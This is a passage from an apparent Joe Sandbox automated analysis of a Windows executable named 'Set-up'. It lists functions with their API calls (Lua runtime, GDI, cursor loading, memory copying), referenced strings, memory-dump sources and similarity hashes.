Part of subcall function 00BDA2A0: lua_copy.SET-UP(?,000000FF,00BDA8E5,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA3A4

lua_pushfstring.SET-UP(?,function '%s',?,?,?,?,00BDA74B), ref: 00BDA431
lua_pushfstring.SET-UP(?,%s '%s',?,?,?,?,?,00BDA74B), ref: 00BDA489
lua_pushfstring.SET-UP(?,function <%s:%d>,?,?,?,?,?,00BDA74B), ref: 00BDA4E1

Strings

function <%s:%d>, xrefs: 00BDA4DB
%s '%s', xrefs: 00BDA483
main chunk, xrefs: 00BDA49E
function '%s', xrefs: 00BDA42B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: lua_pushfstring$lua_copylua_getinfolua_pushstringstrncmp
String ID: %s '%s'$function '%s'$function <%s:%d>$main chunk
API String ID: 2618532401-2881968887
Opcode ID: 9d95c69cb3a9455800dd0b09812f0ccf0033565382272fdb5b54f9974103913a
Instruction ID: 4eaa217bc22bbf9f22606e41469863c683062bdf803908d80be3cfed3e8998a4
Opcode Fuzzy Hash: 9d95c69cb3a9455800dd0b09812f0ccf0033565382272fdb5b54f9974103913a
Instruction Fuzzy Hash: D44136717006405BDB249E299C85926F3D1EF80325B18C6BEE81A8B397FB70EC158B91

Function 00BF6FA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C389F0,00000000), ref: 00BF701E
lua_setmetatable.SET-UP(?,000000FE), ref: 00BF70BB
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BF7122
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BF7139

Strings

version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BF7133
__index, xrefs: 00BF70D6
multiple Lua VMs detected, xrefs: 00BF711C

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncslua_setmetatable
String ID: __index$multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
API String ID: 3827939816-3105074172
Opcode ID: 5a11e9442cbc3d0f2943a729e7dcf0d96691d0340973d99088b7287a68865b34
Instruction ID: 6a5616539d358b6bc8aff6a5b9be268230524fc0ffeb4223ea97b808c7c2e8a6
Opcode Fuzzy Hash: 5a11e9442cbc3d0f2943a729e7dcf0d96691d0340973d99088b7287a68865b34
Instruction Fuzzy Hash: 4641A0706046099BC714AF28C845A39F7E2FF84324F14C69DE8698B7D2EB75A815CF81

Function 00BDA2A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lua_getinfo.SET-UP(?,00C5F5BC,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA2BE

Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE2315
Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE235B

Part of subcall function 00BDA0F0: lua_next.SET-UP(?,000000FE,?,?,?,?), ref: 00BDA13A
Part of subcall function 00BDA0F0: lua_type.SET-UP(?,000000FE), ref: 00BDA149
Part of subcall function 00BDA0F0: lua_next.SET-UP(?,000000FE), ref: 00BDA1A7

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,_G.,00000003,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA34D
lua_pushstring.SET-UP(?,?,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA35F
lua_copy.SET-UP(?,000000FF,00BDA8E5,?,?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA3A4
lua_settop.SET-UP(?,?,?,?,?,?,00BDA8E5,00000001,?,?), ref: 00BDA3BE

Strings

_LOADED, xrefs: 00BDA2CD
_G., xrefs: 00BDA347

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: lua_nextstrchr$lua_copylua_getinfolua_pushstringlua_settoplua_typestrncmp
String ID: _G.$_LOADED
API String ID: 429446339-344459542
Opcode ID: 689d0ab14cc4bd6b62b18fa9eb553790a354e419e60c6085dc609eefb0968b22
Instruction ID: f05c07df4bfbeccb47a3992dc9035a3a8056f8f2677f48eaafdcb5d4df69f937
Opcode Fuzzy Hash: 689d0ab14cc4bd6b62b18fa9eb553790a354e419e60c6085dc609eefb0968b22
Instruction Fuzzy Hash: EA31DB76B006041BD710AA799C8692BF3D6DB81331B5442B9FC1A973C7FE61DD058792

Function 00A65750 Relevance: 12.2, APIs: 8, Instructions: 213COMMON

Download Yara Rule

APIs

roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65782
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65792
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6580C
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6581C
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A658BA
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A658CA
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6595A
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A6596A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: roundf
String ID:
API String ID: 1470247359-0
Opcode ID: 0b460f80ac23a0aabae897e35ff4c97331c192ed5a68a7a36a6fb8a82d84fe4f
Instruction ID: 8f67f04deb027c4fb59345f50c774aef2f4baf5cc1698d219331b9f73f402709
Opcode Fuzzy Hash: 0b460f80ac23a0aabae897e35ff4c97331c192ed5a68a7a36a6fb8a82d84fe4f
Instruction Fuzzy Hash: 3691BF70609345DFC7009F64E58896ABBF0FF88B04F518959F9D5A2268E731D834CF96

Function 00A62F60 Relevance: 12.1, APIs: 8, Instructions: 53COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A62F7C
DeleteObject.GDI32(?), ref: 00A62F81
SelectObject.GDI32(?,?), ref: 00A62F9C
DeleteObject.GDI32(?), ref: 00A62FA1
SelectObject.GDI32(?,?), ref: 00A62FBC
SelectObject.GDI32(?,?), ref: 00A62FD0
DeleteObject.GDI32(?), ref: 00A62FD5
DeleteDC.GDI32(?), ref: 00A62FEE

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-0
Opcode ID: 2de133c2d5887fdc47a88580d9891c62a1ee82773a4d1ceb495f798df23142d3
Instruction ID: b2d37dd706f15528a63b14df1607c21f55a2c6799216898ecd0a821a3ca686c8
Opcode Fuzzy Hash: 2de133c2d5887fdc47a88580d9891c62a1ee82773a4d1ceb495f798df23142d3
Instruction Fuzzy Hash: F2116D70104B019BE7319F26CD48B17FBF9AF48314F054A1DE89A92AA0D775E859DF60

Function 00A6FBF0 Relevance: 10.8, APIs: 7, Instructions: 260windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?), ref: 00A6FC43

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Focus
String ID:
API String ID: 2734777837-0
Opcode ID: aee877884ea6378d5ff3951dabaf2dd8a90dbf820dda3e4dcb4519fd321efb93
Instruction ID: 6dfdb87ddeabae230ce12b35eeb3bbf259dd8099107f2bca58d5d7452a64aa97
Opcode Fuzzy Hash: aee877884ea6378d5ff3951dabaf2dd8a90dbf820dda3e4dcb4519fd321efb93
Instruction Fuzzy Hash: 6B91AF312083019FCB24EF28E956B7EB7F5EB98714F10453EF94A9B291DB70A804C796

Function 00A73860 Relevance: 10.7, APIs: 7, Instructions: 228COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 00A7395A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00A739BC
GlobalUnlock.KERNEL32(?), ref: 00A739D2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A73A05
ScreenToClient.USER32(?,?), ref: 00A73A7E
ReleaseStgMedium.OLE32(?), ref: 00A73ADD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,00000000,?,?,?), ref: 00A73B09

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Global$ClientLockMediumReleaseScreenUnlock
String ID:
API String ID: 4130750421-0
Opcode ID: 2a1da7747d85f2ea2b3bc8bda6c7f6ab360a0cffab079c0551a48300b6b420b1
Instruction ID: f722ef4258fecc4008ba0a4344799eebdd3d2c11881d89300612f0884044458f
Opcode Fuzzy Hash: 2a1da7747d85f2ea2b3bc8bda6c7f6ab360a0cffab079c0551a48300b6b420b1
Instruction Fuzzy Hash: 28919C72E002099BDF14DFA8CC45BAEBBB5FF48310F10C169E929AB291DB359A41CF50

Function 00A74BF0 Relevance: 10.7, APIs: 7, Instructions: 210COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00A74CE5
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?), ref: 00A74D06
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,?,?,?,?), ref: 00A74D7C
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00A74DA8
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?), ref: 00A74DBF

Part of subcall function 00A624A0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(vector<T> too long,00A62490), ref: 00A624A5

memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00A74DD9
memcpy.VCRUNTIME140(?,?,?,?,?,?), ref: 00A74DF9

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$Xlength_error@std@@_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 648083828-0
Opcode ID: acb4fcb9625d0287aef2e0360e3b795172125e6d3119590fe1b3dfbd20cb0dec
Instruction ID: 9e127057468ab46f3dcdeaa2d832fef5e03a21cab02b4d6719b5082ed8a1d47c
Opcode Fuzzy Hash: acb4fcb9625d0287aef2e0360e3b795172125e6d3119590fe1b3dfbd20cb0dec
Instruction Fuzzy Hash: AE61C2B2900515AFCB15DF7CCD859BEB7A8AF08310B14C769F929D7691EB30A914C790

Function 00BFAA80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C38B6C,00000000), ref: 00BFAAFD
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BFAB66
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BFAB7D

Strings

version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BFAB77
multiple Lua VMs detected, xrefs: 00BFAB60
charpattern, xrefs: 00BFAB39

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncs
String ID: charpattern$multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2970048142-578831968
Opcode ID: 8a80ff15a6e97f504a1645c062c350cf253aac79a19a4e4e9bb652ad3f5c5f50
Instruction ID: b2ba57a61f5783ba084d4c7031405dfe49155a5c0caf0f39028b4cc6c081b490
Opcode Fuzzy Hash: 8a80ff15a6e97f504a1645c062c350cf253aac79a19a4e4e9bb652ad3f5c5f50
Instruction Fuzzy Hash: 232126B07006045BD724BB28C846B2A77D1EF40714F1085E8E99A8B3C2EB7599198BCA

Function 00A6C3E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79comlibraryloaderCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00A6C3EF
GetModuleHandleW.KERNEL32(user32.dll,?,?,?,?,?,?,70576E16), ref: 00A6C400
GetProcAddress.KERNEL32(00000000,SetCoalescableTimer), ref: 00A6C414

Strings

2, xrefs: 00A6C562
user32.dll, xrefs: 00A6C3F5
SetCoalescableTimer, xrefs: 00A6C40E

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: AddressHandleInitializeModuleProc
String ID: 2$SetCoalescableTimer$user32.dll
API String ID: 3965314501-3203590622
Opcode ID: 3b339088be4596d4f0660eb32aa5b754a2bdf60c5cd631096b1fa68e0648b162
Instruction ID: f19e4dc2c87061da018c2831fbb8eb8b914097cf20f3585cb7fe70cc70320a72
Opcode Fuzzy Hash: 3b339088be4596d4f0660eb32aa5b754a2bdf60c5cd631096b1fa68e0648b162
Instruction Fuzzy Hash: CA41E6B11083468BE700CF14C81835BBBE0BF85758F55096CE5982B396CBBA960DCFCA

Function 00BED050 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61stringCOMMON

Download Yara Rule

APIs

strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,-0123456789,?,%.14g,?), ref: 00BED0AB
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00BED0BB

Strings

%.14g, xrefs: 00BED094
-0123456789, xrefs: 00BED0A5
0, xrefs: 00BED0C9
%lld, xrefs: 00BED07A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: localeconvstrspn
String ID: %.14g$%lld$-0123456789$0
API String ID: 737097207-4294742169
Opcode ID: 38dfe886e3ae748fa395f6601095f3db2351c18ed481d00b1c47d3ee988362d7
Instruction ID: 36fd9bbaae9d27a4b989d566fecc9f627387f9ab3b8e232e1d91c0c615e1400f
Opcode Fuzzy Hash: 38dfe886e3ae748fa395f6601095f3db2351c18ed481d00b1c47d3ee988362d7
Instruction Fuzzy Hash: 9D1108B16047809FC730AB78984596BFBE8AF85300F144DAEE5C7C3252EA71D554CB92

Function 00A68160 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F01), ref: 00A6817D
LoadCursorW.USER32(00000000,00007F04), ref: 00A68194
LoadCursorW.USER32(00000000,00007F02), ref: 00A681AB
LoadCursorW.USER32(00000000,00007F84), ref: 00A681C2
LoadCursorW.USER32(00000000,00007F85), ref: 00A681D9
LoadCursorW.USER32(00000000,00007F89), ref: 00A681F0
LoadCursorW.USER32(00000000,00007F00), ref: 00A68207

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: d3bdf439014e5ab73c252825175362a893cf70d2532b527f6b04ad10afe43c37
Instruction ID: 76a738fc3296fdbbda7941a7e4269bee76fd2ab7b31c56a78b47f8684c5f2337
Opcode Fuzzy Hash: d3bdf439014e5ab73c252825175362a893cf70d2532b527f6b04ad10afe43c37
Instruction Fuzzy Hash: 6511407158D208EFE3809FE0FC49B6C7BB0E704B02F1285A2F60E992D0CBB66010CB91

Function 00A8A1D0 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,?,?), ref: 00A8A27D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A8A2C8
memcpy.VCRUNTIME140(00000000,?,?,?,?,?), ref: 00A8A2D0

Part of subcall function 00BFDF75: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A

memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00A8A3C3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 00A8A41B
memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 00A8A424

Part of subcall function 00A6B900: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00A75F13,?,?,00000040), ref: 00A6B905

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn$Xlength_error@std@@malloc
String ID:
API String ID: 292149383-0
Opcode ID: 9e72a1bd04e368868eb41a4e30babd8b47347e4f578e0b7c4926e8ab0f72243e
Instruction ID: d853159c017214a979188772b7c7a73c052bce28139f65b0706610d0c26e16f1
Opcode Fuzzy Hash: 9e72a1bd04e368868eb41a4e30babd8b47347e4f578e0b7c4926e8ab0f72243e
Instruction Fuzzy Hash: FD817772A001059BDB25EF68D8809BEB7A5FF91314B2443BEE829CB351E731ED15C792

Function 00A6CA40 Relevance: 9.2, APIs: 6, Instructions: 170COMMON

Download Yara Rule

APIs

CreateRectRgnIndirect.GDI32(?), ref: 00A6CB18
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00A6CB2F
CombineRgn.GDI32(00000000,00000000,?,00000004), ref: 00A6CB48
DeleteObject.GDI32(00000000), ref: 00A6CB5B
DeleteObject.GDI32(?), ref: 00A6CB60
